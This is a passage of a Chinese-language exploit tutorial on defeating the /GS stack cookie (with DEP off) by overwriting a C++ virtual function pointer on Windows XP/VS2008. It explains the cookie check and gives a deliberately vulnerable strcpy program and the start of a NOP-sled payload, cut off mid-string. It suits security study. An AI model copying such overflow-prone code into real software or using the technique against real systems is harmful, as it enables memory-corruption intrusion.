淹没虚函数地址过GS保护（关闭DEP保护）

作者:黑蛋

1.简介
针对缓冲区溢出覆盖函数返回地址这一特征，微软在编译程序时使用了一个安全编译选项–GS， Visual Studio 2003 (VS 7.0)及以后版本的 Visual Studio 中默认启用了这个编译选项。在所有函数调用时，会向栈中压入一个DWORD，他是data段第一个DWORD与EBP亦或之后形成的值，处于EBP+4的位置，在所有函数执行完返回时，会有一个检查函数，检测EBP+4的值是否和原来一样，一样则正常返回，反之进入异常处理流程，函数不会正常返回，这个操作叫 Security check，如果有缓冲区溢出函数返回值，势必会淹没Security Cookie，进入异常处理流程。如果我们在有GS保护的程序中使用栈溢出淹没返回地址EBP+4的位置，势必会破坏EBP-4的值，在函数返回之前经过Security check，会直接导致我们栈溢出淹没返回值失败，本篇通过调用c++虚函数在GS检查函数之前的特征，通过淹没虚函数地址，让虚函数地址指向我们的shellcode，达到绕过GS保护成功溢出的目的。详细了解GS保护机制可以参考《0day安全》这本书。

2.环境配置

环境

配置

操作系统

XP系统

编译器

vs2008

调试器

x32dbg

3.代码
#include “stdafx.h”
#include “string.h”
class GSVirtual {
public :
void gsv(char * src)
{
char buf[200];
strcpy(buf, src);
bar();
}
virtual void bar()
{
}
};
int main()
{

GSVirtual test;
test.gsv("\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90"
   "\